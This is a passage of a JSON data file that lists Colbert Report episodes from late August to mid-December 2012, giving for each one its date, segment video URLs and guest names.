        "http://thecolbertreport.cc.com/videos/z0q2d6/hurricane-isaac-at-gop-convention",
        "http://thecolbertreport.cc.com/videos/2a1lg4/colbert-super-pac---hurricane-isaac---stephen-s-money-convention",
        "http://thecolbertreport.cc.com/videos/kcyg86/todd-akin-s-abortion-gaffe",
        "http://thecolbertreport.cc.com/videos/2f1kwv/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/qomrph/sign-off---goodnight"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2012-08-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ane28t/america-strikes-back---episode-ii---return-of-the-america-strikes-back--again",
        "http://thecolbertreport.cc.com/videos/std0vn/the-mitt-romney-story",
        "http://thecolbertreport.cc.com/videos/3teieb/the-mitt-romney-story---ann-romney-s-gop-convention-speech",
        "http://thecolbertreport.cc.com/videos/w1ej3a/mitt-romney-s-role-model",
        "http://thecolbertreport.cc.com/videos/n7yuw7/ayn-rand---paul-ryan",
        "http://thecolbertreport.cc.com/videos/v0fegj/jennifer-burns",
        "http://thecolbertreport.cc.com/videos/gxzmx3/sign-off---goodnight"
      ],
      "guest": "Jennifer Burns"
    },
    {
      "date": "2012-08-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0pjdyn/america-strikes-back---episode-iii---the-phantom-money",
        "http://thecolbertreport.cc.com/videos/7543m5/the-gop-convention---mitt-romney-s-minority-appeal",
        "http://thecolbertreport.cc.com/videos/vo7txi/paul-ryan-s-misleading-gop-convention-speech",
        "http://thecolbertreport.cc.com/videos/ghjrfh/jon-huntsman-pt--1",
        "http://thecolbertreport.cc.com/videos/93jjo7/jon-huntsman-pt--2",
        "http://thecolbertreport.cc.com/videos/vi4rti/sign-off---goodnight"
      ],
      "guest": "Jon Huntsman"
    },
    {
      "date": "2012-08-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x9yoif/america-strikes-back---episode-iv---a-new-ish-hope",
        "http://thecolbertreport.cc.com/videos/9czru3/mitt-romney-s--solid--gop-convention-speech",
        "http://thecolbertreport.cc.com/videos/spqhue/the-gop-convention-s-mystery-speaker",
        "http://thecolbertreport.cc.com/videos/qrijg7/the-gop-convention-s-mystery-speaker---clint-eastwood-s-chair",
        "http://thecolbertreport.cc.com/videos/cx5s7v/neil-armstrong-tribute",
        "http://thecolbertreport.cc.com/videos/n0qmbf/james-carville",
        "http://thecolbertreport.cc.com/videos/2cv31s/sign-off---goodnight"
      ],
      "guest": "James Carville"
    },
    {
      "date": "2012-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r83jxh/exclusive---better-know-a-district---new-york-s-9th---yvette-clarke",
        "http://thecolbertreport.cc.com/videos/mxucyy/the-2012-people-s-party-congress-of-charlotte",
        "http://thecolbertreport.cc.com/videos/bg56qn/better-know-a-district---new-york-s-9th---yvette-clarke",
        "http://thecolbertreport.cc.com/videos/cy97ce/paul-ryan-s-marathon-time-gaffe",
        "http://thecolbertreport.cc.com/videos/stj7xj/reihan-salam",
        "http://thecolbertreport.cc.com/videos/awwi1z/sign-off---goodnight"
      ],
      "guest": "Reihan Salam"
    },
    {
      "date": "2012-09-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4axjsp/the-2012-people-s-party-congress-of-charlotte---sound-system",
        "http://thecolbertreport.cc.com/videos/lnxbm7/the-2012-people-s-party-congress-of-charlotte---michelle-obama---tammy-duckworth",
        "http://thecolbertreport.cc.com/videos/zp0jy0/the-2012-people-s-party-congress-of-charlotte---michelle-obama-s-speech-tweets",
        "http://thecolbertreport.cc.com/videos/75ubcv/sport-report---nfl-referee-lockout",
        "http://thecolbertreport.cc.com/videos/fjhhan/michael-grunwald",
        "http://thecolbertreport.cc.com/videos/05j0ux/sign-off---goodnight"
      ],
      "guest": "Michael Grunwald"
    },
    {
      "date": "2012-09-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vf84g8/the-2012-people-s-party-congress-of-charlotte---avoiding-water-gate--day-1",
        "http://thecolbertreport.cc.com/videos/qfodha/the-2012-people-s-party-congress-of-charlotte---bill-clinton---hill-poll",
        "http://thecolbertreport.cc.com/videos/p7kw6y/the-2012-people-s-party-congress-of-charlotte---god---jerusalem",
        "http://thecolbertreport.cc.com/videos/epwrup/bill-richardson",
        "http://thecolbertreport.cc.com/videos/8ivg8l/sign-off---taco-plate"
      ],
      "guest": "Bill Richardson"
    },
    {
      "date": "2012-09-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9wdqkq/the-2012-people-s-party-congress-of-charlotte---youth-vote",
        "http://thecolbertreport.cc.com/videos/cr72mv/the-2012-people-s-party-congress-of-charlotte---tom-brokaw---barack-obama",
        "http://thecolbertreport.cc.com/videos/l9ys9b/rnc-convention-vs--dnc-convention",
        "http://thecolbertreport.cc.com/videos/6oqr0u/the-2012-people-s-party-congress-of-charlotte---colbert-bump",
        "http://thecolbertreport.cc.com/videos/oq50sl/ed-rendell",
        "http://thecolbertreport.cc.com/videos/fbd0do/sign-off---goodnight"
      ],
      "guest": "Ed Rendell"
    },
    {
      "date": "2012-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ohliey/intro---9-17-12",
        "http://thecolbertreport.cc.com/videos/q2ib3a/values-voter-summit-gaffe",
        "http://thecolbertreport.cc.com/videos/kelspo/mitt-romney-s-libya-comments",
        "http://thecolbertreport.cc.com/videos/liknzb/atone-phone---ira-glass-calls",
        "http://thecolbertreport.cc.com/videos/454q6n/drew-faust",
        "http://thecolbertreport.cc.com/videos/lh4d2v/sign-off---shofar"
      ],
      "guest": "Drew Faust"
    },
    {
      "date": "2012-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v7w7w3/intro---9-18-12",
        "http://thecolbertreport.cc.com/videos/53lqfp/logo-makeover-for-usa-today",
        "http://thecolbertreport.cc.com/videos/dsvsbf/mitt-romney-s-secret-video",
        "http://thecolbertreport.cc.com/videos/m021ol/tip-wag---apple-samsung-lawsuit---tabloid-clash",
        "http://thecolbertreport.cc.com/videos/ni1t1w/jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/qteu69/sign-off---shrimp-toss"
      ],
      "guest": "Jeffrey Toobin"
    },
    {
      "date": "2012-09-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8pu5um/intro---9-19-12",
        "http://thecolbertreport.cc.com/videos/yf80jg/mitt-romney-s---barack-obama-s-secret-videos",
        "http://thecolbertreport.cc.com/videos/rdsd7t/the-word---ask-not",
        "http://thecolbertreport.cc.com/videos/4yfsux/wife-of-jesus",
        "http://thecolbertreport.cc.com/videos/3vyhzj/itzhak-perlman"
      ],
      "guest": "Itzhak Perlman"
    },
    {
      "date": "2012-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8f3t3h/vladimir-putin-s-crane-flight",
        "http://thecolbertreport.cc.com/videos/asy3gz/mitt-romney-s-hispanic-outreach",
        "http://thecolbertreport.cc.com/videos/3f13ot/mitt-romney-s-hispanic-outreach---esteban-colberto",
        "http://thecolbertreport.cc.com/videos/2ufg9n/alpha-dog-of-the-week---cecilia-gimenez",
        "http://thecolbertreport.cc.com/videos/nxad9d/errol-morris",
        "http://thecolbertreport.cc.com/videos/sbgok9/sign-off---ask-o-matic"
      ],
      "guest": "Errol Morris"
    },
    {
      "date": "2012-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kke43t/intro---9-25-12",
        "http://thecolbertreport.cc.com/videos/ahsdxc/mitt-romney-s-airplane-window-gaffe",
        "http://thecolbertreport.cc.com/videos/495xja/national-journal-poll",
        "http://thecolbertreport.cc.com/videos/9vebvz/-rolling-calamity--campaign----america-again--preview",
        "http://thecolbertreport.cc.com/videos/vk8jsq/sport-report---nfl-referee-lockout---replacement-refs---ratings",
        "http://thecolbertreport.cc.com/videos/1my2a8/claressa-shields",
        "http://thecolbertreport.cc.com/videos/n6n3t7/sign-off----america-again-"
      ],
      "guest": "Claressa Shields"
    },
    {
      "date": "2012-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dfrukr/intro---9-26-12",
        "http://thecolbertreport.cc.com/videos/diooyo/yom-kippur---aporkalypse",
        "http://thecolbertreport.cc.com/videos/pnhcq0/obama-s-ottoman-empire",
        "http://thecolbertreport.cc.com/videos/kzi40s/40-days-to-save-america",
        "http://thecolbertreport.cc.com/videos/lsl385/jim-holt",
        "http://thecolbertreport.cc.com/videos/jwctvx/sign-off---turkish-delight"
      ],
      "guest": "Jim Holt"
    },
    {
      "date": "2012-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/373l0t/-america-again--re-becoming-the-greatness-we-never-weren-t-",
        "http://thecolbertreport.cc.com/videos/s9359o/mitt-romney-s-sliding-poll-numbers",
        "http://thecolbertreport.cc.com/videos/zpnkfm/-skewed--presidential-polls",
        "http://thecolbertreport.cc.com/videos/7tmsil/vince-gilligan-pt--1",
        "http://thecolbertreport.cc.com/videos/e6j3e4/vince-gilligan-pt--2",
        "http://thecolbertreport.cc.com/videos/xrnkns/sign-off----america-again-"
      ],
      "guest": "Vince Gilligan"
    },
    {
      "date": "2012-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/21ytsa/mitt-romney-s-tax-plan-math",
        "http://thecolbertreport.cc.com/videos/v5694x/the-word---supply-chained",
        "http://thecolbertreport.cc.com/videos/h64sbo/mahmoud-ahmadinejad-s-un-entourage",
        "http://thecolbertreport.cc.com/videos/k9q5kh/ben-folds-five"
      ],
      "guest": "Ben Folds Five"
    },
    {
      "date": "2012-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5ujlwr/intro---10-2-12",
        "http://thecolbertreport.cc.com/videos/yeek7a/-america-again--release",
        "http://thecolbertreport.cc.com/videos/cy7c9f/pulpit-freedom-sunday",
        "http://thecolbertreport.cc.com/videos/x5r0se/pulpit-freedom-sunday---jim-garlow",
        "http://thecolbertreport.cc.com/videos/oe7wh2/debate-hype---mitt-s-strategy",
        "http://thecolbertreport.cc.com/videos/78yg26/jorge-ramos",
        "http://thecolbertreport.cc.com/videos/dictxb/sign-off----america-again--release"
      ],
      "guest": "Jorge Ramos"
    },
    {
      "date": "2012-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ef28hc/intro---10-3-12",
        "http://thecolbertreport.cc.com/videos/05md2w/presidential-debates---mitt-romney-s-re-introduction",
        "http://thecolbertreport.cc.com/videos/2cmp66/george-will-s-political-post-racial-journalism",
        "http://thecolbertreport.cc.com/videos/idoutl/cheating-death---low-t",
        "http://thecolbertreport.cc.com/videos/nw3yhm/kenny-rogers",
        "http://thecolbertreport.cc.com/videos/rt3hz7/sign-off---banana-phone"
      ],
      "guest": "Kenny Rogers"
    },
    {
      "date": "2012-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5uncqq/obama-s-debate-apathy---pbs",
        "http://thecolbertreport.cc.com/videos/cl08kb/chris-matthews-s-impotent-rage",
        "http://thecolbertreport.cc.com/videos/inrj8y/mitt-s-socialist-rhetoric---body-language",
        "http://thecolbertreport.cc.com/videos/mw7xqx/mitt-s--etch-a-sketch--behavior",
        "http://thecolbertreport.cc.com/videos/nvjrik/voter-fraud-alert---halloween---pennsylvania",
        "http://thecolbertreport.cc.com/videos/fkt99i/george-church",
        "http://thecolbertreport.cc.com/videos/8vqy9e/sign-off---rabbit-food"
      ],
      "guest": "Dr. George Church"
    },
    {
      "date": "2012-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ohtrd9/intro---10-8-12",
        "http://thecolbertreport.cc.com/videos/53brnc/unemployment-below-eight-percent",
        "http://thecolbertreport.cc.com/videos/uey9b0/the-word---it-s-not-easy-having-green",
        "http://thecolbertreport.cc.com/videos/s8mn29/koch-brothers---orc-senate-candidate",
        "http://thecolbertreport.cc.com/videos/43khod/mark-kelly",
        "http://thecolbertreport.cc.com/videos/sq2eio/sign-off---welcome-baby-brumm-"
      ],
      "guest": "Mark Kelly"
    },
    {
      "date": "2012-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/htdpl2/intro---10-9-12",
        "http://thecolbertreport.cc.com/videos/69kfag/president-obama-s-obsessiveness-plea",
        "http://thecolbertreport.cc.com/videos/0g0ihq/smokin--pole---the-quest-for-arctic-riches---china---russia",
        "http://thecolbertreport.cc.com/videos/fu9mpp/mitt-romney-s-vague--long-winded-foreign-threats",
        "http://thecolbertreport.cc.com/videos/fgftvy/morrissey"
      ],
      "guest": "Morrissey"
    },
    {
      "date": "2012-10-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4jb3d3/intro---10-10-12",
        "http://thecolbertreport.cc.com/videos/ejqp1v/beverage-based-polling---pizza-toppings-town-hall",
        "http://thecolbertreport.cc.com/videos/jur0u9/the-word---meducation",
        "http://thecolbertreport.cc.com/videos/t1y0rc/threatdown---apple-fan-bears--drunk-cars---bears",
        "http://thecolbertreport.cc.com/videos/plccwf/naomi-wolf",
        "http://thecolbertreport.cc.com/videos/od1her/sign-off----vagina--a-new-biography-"
      ],
      "guest": "Naomi Wolf"
    },
    {
      "date": "2012-10-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6smkkc/intro---10-11-12",
        "http://thecolbertreport.cc.com/videos/kiyawb/the-vice-presidential-debate",
        "http://thecolbertreport.cc.com/videos/s190yi/this-changes-everything---obama-s-martian-gayness",
        "http://thecolbertreport.cc.com/videos/2ksunf/formidable-opponent---mitt-romney",
        "http://thecolbertreport.cc.com/videos/xhdwfk/chrystia-freeland",
        "http://thecolbertreport.cc.com/videos/zr1go5/sign-off---goodnight"
      ],
      "guest": "Chrystia Freeland"
    },
    {
      "date": "2012-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fuzsdf/intro---10-15-12",
        "http://thecolbertreport.cc.com/videos/0bmyur/supersonic-space-jump",
        "http://thecolbertreport.cc.com/videos/iudpa7/tip-wag---norway---american-family-association",
        "http://thecolbertreport.cc.com/videos/0q2emr/monkey-on-the-lam---florida---monkey-on-the-gram",
        "http://thecolbertreport.cc.com/videos/zj6xib/evan-thomas",
        "http://thecolbertreport.cc.com/videos/n0kt18/sign-off---goodnight"
      ],
      "guest": "Evan Thomas"
    },
    {
      "date": "2012-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/keo9r0/the-wealth-edge----cool--debate-technology",
        "http://thecolbertreport.cc.com/videos/4aqbh6/affirmative-action-supreme-court-case",
        "http://thecolbertreport.cc.com/videos/y46z6y/affirmative-action-supreme-court-case---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/4uld4g/paul-ryan-s-phony-campaign-photo",
        "http://thecolbertreport.cc.com/videos/4c7frp/cory-booker",
        "http://thecolbertreport.cc.com/videos/juen77/sign-off---iphone"
      ],
      "guest": "Cory Booker"
    },
    {
      "date": "2012-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wd584x/second-presidential-debate-showdown",
        "http://thecolbertreport.cc.com/videos/rjvmac/libya-gate-scandal",
        "http://thecolbertreport.cc.com/videos/j531em/stupid-town-hall-topics",
        "http://thecolbertreport.cc.com/videos/jr7tf6/mitt-s-greatest-debate-triumph",
        "http://thecolbertreport.cc.com/videos/hhxtxg/alpha-dog-of-the-week---scott-desjarlais",
        "http://thecolbertreport.cc.com/videos/f4jil4/tyler-perry",
        "http://thecolbertreport.cc.com/videos/namywp/sign-off---loose-teeth"
      ],
      "guest": "Tyler Perry"
    },
    {
      "date": "2012-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1dfeya/celebrity-campaign-endorsements",
        "http://thecolbertreport.cc.com/videos/rgzljg/mitt-s-first-day",
        "http://thecolbertreport.cc.com/videos/2q39xi/junk-food-feed",
        "http://thecolbertreport.cc.com/videos/xttei6/special-report---a-shucking-disaster---nightmare-at-the-mitchell-corn-palace",
        "http://thecolbertreport.cc.com/videos/t8vgd4/the-killers",
        "http://thecolbertreport.cc.com/videos/ieuitc/sign-off----battle-born-"
      ],
      "guest": "The Killers"
    },
    {
      "date": "2012-10-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0t7wmw/virginia-s-voter-fraud-fighter",
        "http://thecolbertreport.cc.com/videos/jhyr4v/ceo-blackmail---fec-consent",
        "http://thecolbertreport.cc.com/videos/t1yx0h/governor-magorium-s-ganja-emporium",
        "http://thecolbertreport.cc.com/videos/8uddyg/donald-sadoway",
        "http://thecolbertreport.cc.com/videos/czceut/sign-off---goodnight"
      ],
      "guest": "Donald Sadoway"
    },
    {
      "date": "2012-10-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nept6x/stephen-colbert-s-debate-2012-coverage",
        "http://thecolbertreport.cc.com/videos/wowfoq/elusive--mysterious--undecided-voters",
        "http://thecolbertreport.cc.com/videos/twexhe/lance-armstrong-s-doping-scandal",
        "http://thecolbertreport.cc.com/videos/hrawp4/john-grisham",
        "http://thecolbertreport.cc.com/videos/rxk7z1/sign-off---manischewitz"
      ],
      "guest": "John Grisham"
    },
    {
      "date": "2012-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3gbfdl/intro---10-24-12",
        "http://thecolbertreport.cc.com/videos/ifrr4g/donald-trump-s-october-surprise",
        "http://thecolbertreport.cc.com/videos/n9028e/nonstop-libya-gate-questions",
        "http://thecolbertreport.cc.com/videos/gzidte/richard-mourdock-s-rape-comment",
        "http://thecolbertreport.cc.com/videos/swkt4w/anthony-everitt",
        "http://thecolbertreport.cc.com/videos/ug2zqb/sign-off---gop-rape-mention-tally"
      ],
      "guest": "Anthony Everitt"
    },
    {
      "date": "2012-10-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7k4pkh/intro---10-25-12",
        "http://thecolbertreport.cc.com/videos/a0h9on/voting---hormones",
        "http://thecolbertreport.cc.com/videos/zu00re/stephen-ghoulbert-s-spooky-time-halloween-fun-guide---tom-hanks",
        "http://thecolbertreport.cc.com/videos/pb058e/mitch-daniels-pt--1",
        "http://thecolbertreport.cc.com/videos/9tzl4i/mitch-daniels-pt--2",
        "http://thecolbertreport.cc.com/videos/pstvp6/sign-off---murderer-skull-model"
      ],
      "guest": "Gov. Mitch Daniels"
    },
    {
      "date": "2012-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rky5ab/hurricane-sandy-s-aftermath",
        "http://thecolbertreport.cc.com/videos/ey2jqz/hurricane-sandy---election-day",
        "http://thecolbertreport.cc.com/videos/lk60fg/flamboyant-sandy---federal-relief-debate",
        "http://thecolbertreport.cc.com/videos/5vx4ad/donald-trump-s-october-surprise-extension",
        "http://thecolbertreport.cc.com/videos/x89ju7/lilly-ledbetter",
        "http://thecolbertreport.cc.com/videos/jqfgo3/sign-off---american-red-cross---hurricane-sandy"
      ],
      "guest": "Lilly Ledbetter"
    },
    {
      "date": "2012-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hk2ox4/intro---11-1-12",
        "http://thecolbertreport.cc.com/videos/mtuxrh/hurricane-sandy-traffic-ordeal",
        "http://thecolbertreport.cc.com/videos/pdmw4z/tip-wag---constant-documentation---billy-graham",
        "http://thecolbertreport.cc.com/videos/rmzkbz/david-byrne---st--vincent",
        "http://thecolbertreport.cc.com/videos/w4v4gd/sign-off---american-red-cross---hurricane-sandy"
      ],
      "guest": "David Byrne &amp; St. Vincent"
    },
    {
      "date": "2012-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mm7c7b/colbert-super-pac---severe-candidate-warning",
        "http://thecolbertreport.cc.com/videos/h3qcht/shame-based-campaigning",
        "http://thecolbertreport.cc.com/videos/ga4hky/shame-based-campaigning---sasha-issenberg",
        "http://thecolbertreport.cc.com/videos/ef460s/-razor-tight--presidential-election",
        "http://thecolbertreport.cc.com/videos/tl7vb4/nate-silver",
        "http://thecolbertreport.cc.com/videos/i1cdch/sign-off---go-vote-"
      ],
      "guest": "Nate Silver"
    },
    {
      "date": "2012-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2wfr8k/the-colbert-report-election-2012---who-will-replace-obama---012",
        "http://thecolbertreport.cc.com/videos/ydqq2x/the-colbert-report-election-2012---too-close-to-call",
        "http://thecolbertreport.cc.com/videos/b9hvj6/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/vghwne/senate-races---state-referenda",
        "http://thecolbertreport.cc.com/videos/cao81i/sign-off---election-reflections"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2012-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d96ihg/intro---11-7-12",
        "http://thecolbertreport.cc.com/videos/zviz5s/four-more-years-of-hopey-change",
        "http://thecolbertreport.cc.com/videos/hbkurh/nontraditional-non-white-america",
        "http://thecolbertreport.cc.com/videos/btqtta/polling-irregularities---vote-by-phone-scam",
        "http://thecolbertreport.cc.com/videos/wjevw3/wind-power-s-health-hazards",
        "http://thecolbertreport.cc.com/videos/xs8d72/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/6iwo2a/sign-off---solace-in-a-bottle"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2012-11-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lttdhm/intro---11-8-12",
        "http://thecolbertreport.cc.com/videos/op51y2/nor-easter---mitt-romney",
        "http://thecolbertreport.cc.com/videos/ryj0jw/difference-makers---stephen-dick-jr-",
        "http://thecolbertreport.cc.com/videos/25lwb9/the-plight-of-platonic-relationships",
        "http://thecolbertreport.cc.com/videos/doygtf/rachel-maddow",
        "http://thecolbertreport.cc.com/videos/jzxfgf/sign-off---goodnight"
      ],
      "guest": "Rachel Maddow"
    },
    {
      "date": "2012-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3szdub/david-petraeus-s--all-in--affair",
        "http://thecolbertreport.cc.com/videos/kj1cs9/colbert-super-pac-shh----karl-rove---jon-stewart",
        "http://thecolbertreport.cc.com/videos/66y7dx/colbert-super-pac-shh----secret-second-501c4---trevor-potter",
        "http://thecolbertreport.cc.com/videos/tl4uce/blitzkrieg-on-grinchitude---santa-s-pipe",
        "http://thecolbertreport.cc.com/videos/6vpcf3/ken-burns",
        "http://thecolbertreport.cc.com/videos/3w1i4s/sign-off---goodbye-colbert-super-pac"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2012-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i9yvhl/intro---11-13-12",
        "http://thecolbertreport.cc.com/videos/uml8yd/2072--race-to-the-white-orb",
        "http://thecolbertreport.cc.com/videos/s5vmrx/tip-wag---pranab-mukherjee--brazilian-scientists--sonia-sotomayor",
        "http://thecolbertreport.cc.com/videos/icmpvx/newt-gingrich-pt--1",
        "http://thecolbertreport.cc.com/videos/61deqz/newt-gingrich-pt--2",
        "http://thecolbertreport.cc.com/videos/ujlf67/sign-off---goodnight"
      ],
      "guest": "Newt Gingrich"
    },
    {
      "date": "2012-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e0pxrk/intro---11-14-12",
        "http://thecolbertreport.cc.com/videos/3zu15f/who-s-attacking-me-now----canadian-broadcasting-corporation",
        "http://thecolbertreport.cc.com/videos/kvs6wn/high-frequency-trading",
        "http://thecolbertreport.cc.com/videos/ba8i6j/high-frequency-trading---christopher-steiner",
        "http://thecolbertreport.cc.com/videos/wvf1nd/tony-kushner-pt--1",
        "http://thecolbertreport.cc.com/videos/ezygjv/tony-kushner-pt--2",
        "http://thecolbertreport.cc.com/videos/cz0sty/sign-off---goodnight"
      ],
      "guest": "Tony Kushner"
    },
    {
      "date": "2012-11-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cazbp6/intro---11-15-12",
        "http://thecolbertreport.cc.com/videos/regxdh/millennial-generation-soup-campaign",
        "http://thecolbertreport.cc.com/videos/jy83mg/general-s-hospital",
        "http://thecolbertreport.cc.com/videos/xve006/cheating-death---flu-fighting-meth",
        "http://thecolbertreport.cc.com/videos/we1zlp/chris-stringer",
        "http://thecolbertreport.cc.com/videos/f23a7f/sign-off---the-colbert-report-s-seventh-anniversary"
      ],
      "guest": "Chris Stringer"
    },
    {
      "date": "2012-11-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9ex0kp/intro---11-26-12",
        "http://thecolbertreport.cc.com/videos/i4lmrj/stephen-s-thanksgiving---holy-black-friday",
        "http://thecolbertreport.cc.com/videos/242ato/judge--jury---executioner---copyright-law",
        "http://thecolbertreport.cc.com/videos/ob3lcn/blitzkrieg-on-grinchitude---pope-benedict-xvi",
        "http://thecolbertreport.cc.com/videos/std5aq/jake-tapper",
        "http://thecolbertreport.cc.com/videos/o2lec3/sign-off---goodnight"
      ],
      "guest": "Jake Tapper"
    },
    {
      "date": "2012-11-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oh9w4r/canada-s-grinch",
        "http://thecolbertreport.cc.com/videos/7imsna/the-fiscal-cliff-compromise",
        "http://thecolbertreport.cc.com/videos/72sdt0/the-fiscal-cliff-compromise---reihan-salam",
        "http://thecolbertreport.cc.com/videos/1fuekz/dolly-parton",
        "http://thecolbertreport.cc.com/videos/nqrlrq/sign-off---country-chords"
      ],
      "guest": "Dolly Parton"
    },
    {
      "date": "2012-11-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ui3lan/intro---11-28-12",
        "http://thecolbertreport.cc.com/videos/omvkv3/record-powerball-jackpot",
        "http://thecolbertreport.cc.com/videos/tnr1l8/the-word---sisters-are-doing-it-to-themselves",
        "http://thecolbertreport.cc.com/videos/xpxkwl/filibuster-reform",
        "http://thecolbertreport.cc.com/videos/qc393o/frank-oz",
        "http://thecolbertreport.cc.com/videos/b9jkcc/sign-off---stephen-s-muppet"
      ],
      "guest": "Frank Oz"
    },
    {
      "date": "2012-11-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gnb0gv/intro---11-29-12",
        "http://thecolbertreport.cc.com/videos/cehmsr/moon-shattering-news",
        "http://thecolbertreport.cc.com/videos/9o0ttj/tip-wag---gay-rights-pioneers---gun-dorms",
        "http://thecolbertreport.cc.com/videos/dgy710/top-10-of-2012---operation-killing--killing-kennedy-",
        "http://thecolbertreport.cc.com/videos/qyxymb/sean-carroll",
        "http://thecolbertreport.cc.com/videos/z8pd91/sign-off---acceptance-speech"
      ],
      "guest": "Sean Carroll"
    },
    {
      "date": "2012-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c2msxt/the-pundit--or-colbert-and-back-again",
        "http://thecolbertreport.cc.com/videos/i94qww/the-pundit--or-colbert-and-back-again---hobbit-week-lineup",
        "http://thecolbertreport.cc.com/videos/zkpe65/the-word---base-instincts",
        "http://thecolbertreport.cc.com/videos/47ssk7/senior-moment---granny-pods",
        "http://thecolbertreport.cc.com/videos/zm84yu/ian-mckellen",
        "http://thecolbertreport.cc.com/videos/u8z3mx/sign-off---the-pundit--or-colbert-and-back-again---sting"
      ],
      "guest": "Ian McKellen"
    },
    {
      "date": "2012-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ri5csw/the-pundit--or-colbert-and-back-again---hobbit-week-night-two",
        "http://thecolbertreport.cc.com/videos/q3aiti/low-t---low-o",
        "http://thecolbertreport.cc.com/videos/n7lg1x/kate-the-great-s-morning-sickness",
        "http://thecolbertreport.cc.com/videos/v8syf8/martin-freeman",
        "http://thecolbertreport.cc.com/videos/rmahy7/sign-off---the-pundit--or-colbert-and-back-again---rivendell"
      ],
      "guest": "Martin Freeman"
    },
    {
      "date": "2012-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qtkdcn/the-pundit--or-colbert-and-back-again---hobbit-week-night-three",
        "http://thecolbertreport.cc.com/videos/6x66a7/the-word---hire-learning",
        "http://thecolbertreport.cc.com/videos/9j5qtc/politicos---paranoid-fantasies",
        "http://thecolbertreport.cc.com/videos/m8dp2f/andy-serkis",
        "http://thecolbertreport.cc.com/videos/msip4s/sign-off---the-pundit--or-colbert-and-back-again---one-ring"
      ],
      "guest": "Peter Jackson"
    },
    {
      "date": "2012-12-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/teluzg/the-pundit--or-colbert-and-back-again---hobbit-week-night-four",
        "http://thecolbertreport.cc.com/videos/hhe4hg/jim-demint-s-resignation",
        "http://thecolbertreport.cc.com/videos/d0n0vz/stephen-colbert--wax-on---wax-off-at-madame-tussauds-pt--1",
        "http://thecolbertreport.cc.com/videos/1voj50/stephen-colbert--wax-on---wax-off-at-madame-tussauds-pt--2",
        "http://thecolbertreport.cc.com/videos/0tvck8/peter-jackson",
        "http://thecolbertreport.cc.com/videos/fbqohj/sign-off---the-pundit--or-colbert-and-back-again---hobbit-week-concludes"
      ],
      "guest": "Andy Serkis"
    },
    {
      "date": "2012-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0cfmll/stephen-for-u-s--senate",
        "http://thecolbertreport.cc.com/videos/8skoq2/fox-news-s-secret-presidential-recruit",
        "http://thecolbertreport.cc.com/videos/gdygvq/diana-krall"
      ],
      "guest": "Diana Krall, Elvis Costello"
    },
    {
      "date": "2012-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t45azb/intro---12-11-12",
        "http://thecolbertreport.cc.com/videos/69xjmc/fiscal-cliff-negotiations",
        "http://thecolbertreport.cc.com/videos/iwvp9d/threatdown---commie-unicorns---foreman-barbie",
        "http://thecolbertreport.cc.com/videos/8is78z/ex-gay-therapy-debate",
        "http://thecolbertreport.cc.com/videos/m3omdi/malcolm-gladwell"
      ],
      "guest": "Malcolm Gladwell, Audra McDonald"
    },
    {
      "date": "2012-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hoair6/success-for-operation-killing--killing-kennedy-",
        "http://thecolbertreport.cc.com/videos/8aazot/stephen-s-appointment-with-destiny---jeff-bingaman",
